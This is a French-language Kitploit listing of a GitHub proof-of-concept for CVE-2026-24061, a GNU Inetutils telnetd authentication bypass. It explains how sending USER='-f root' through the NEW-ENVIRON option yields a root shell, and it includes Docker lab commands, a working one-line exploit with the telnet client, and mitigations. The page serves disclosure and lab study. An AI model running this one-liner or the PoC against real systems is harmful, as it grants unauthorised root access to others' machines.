Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-24061 — Exploit de preuve de concept pour le contournement de l'authentification de telnetd de GNU Inetutils (CVE-2026-24061) avec configuration de laboratoire Docker et PoC en Go. Exploite l'option NEW-ENVIRON pour obtenir un shell root. | Kitploit
Outils/GitHubGitHub/chocapikk/cve-2026-24061
Authentification et AutorisationAnalyse des VulnérabilitésExploitationSécurité RéseauTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubchocapikk/cve-2026-24061

CVE-2026-24061

Exploit de preuve de concept pour le contournement de l'authentification de telnetd de GNU Inetutils (CVE-2026-24061) avec configuration de laboratoire Docker et PoC en Go. Exploite l'option NEW-ENVIRON pour obtenir un shell root.

Voir le dépôt
123il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-24061

GNU Inetutils telnetd Contournement d'authentification à distance

Sérieusement, telnet en 2026 ? Allez les gars, il est temps de passer à autre chose. SSH existe depuis 1995. 🤦

Description

Une vulnérabilité critique de contournement d'authentification dans GNU Inetutils telnetd affectant les versions 1.9.3 à 2.7.

La vulnérabilité exploite l'option telnet NEW-ENVIRON pour injecter des arguments malveillants dans login(1). En définissant USER=-f root via le protocole telnet, un attaquant peut contourner l'authentification et obtenir un shell root sans identifiants.

Versions affectées

  • GNU Inetutils 1.9.3 - 2.7

Détails techniques

Le protocole telnet prend en charge l'option NEW-ENVIRON (RFC 1572) qui permet au client d'envoyer des variables d'environnement au serveur. Le démon telnetd transmet la variable USER à login(1) comme argument.

En envoyant USER=-f root, la valeur est interprétée comme :

  • Option -f : Ignorer l'authentification (hôte de confiance)
  • root : Utilisateur cible

Cela provoque l'exécution de login -f root, accordant un accès root immédiat.

Le PoC détecte une exploitation réussie en vérifiant la présence de IAC WILL ECHO (0xff 0xfb 0x01) — le signal de protocole que le serveur envoie lorsque l'accès au shell est accordé.

Configuration du laboratoire

root@kitploit:~
# Construire et exécuter le conteneur telnetd vulnérable
docker compose up --build -d

# Tester l'exploit
go run poc.go 127.0.0.1 2323

Exploitation

root@kitploit:~
# Utilisation du PoC Go (avec shell interactif)
go run poc.go <cible> <port>

# PoC simple utilisant le client telnet standard
env USER='-f root' telnet -a <cible> <port>

Atténuation

  • Arrêtez d'utiliser telnet en 2026, sérieusement 🙏
  • Utilisez SSH à la place (ça fait déjà 31 ans que ça existe, j'étais même pas né en 95 lol)
  • Mettez à jour vers une version corrigée de GNU Inetutils
  • Restreignez l'accès telnet via les règles du pare-feu

Fichiers

  • poc.go - Exploit Go avec shell interactif
  • Dockerfile - Conteneur telnetd vulnérable
  • docker-compose.yml - Orchestration du laboratoire

Références

  • Avis : https://www.openwall.com/lists/oss-security/2026/01/20/2
  • GNU Inetutils : https://www.gnu.org/software/inetutils/
  • RFC 1572 (NEW-ENVIRON) : https://tools.ietf.org/html/rfc1572

Crédits

  • LeakIX Research Team
Télécharger l’outil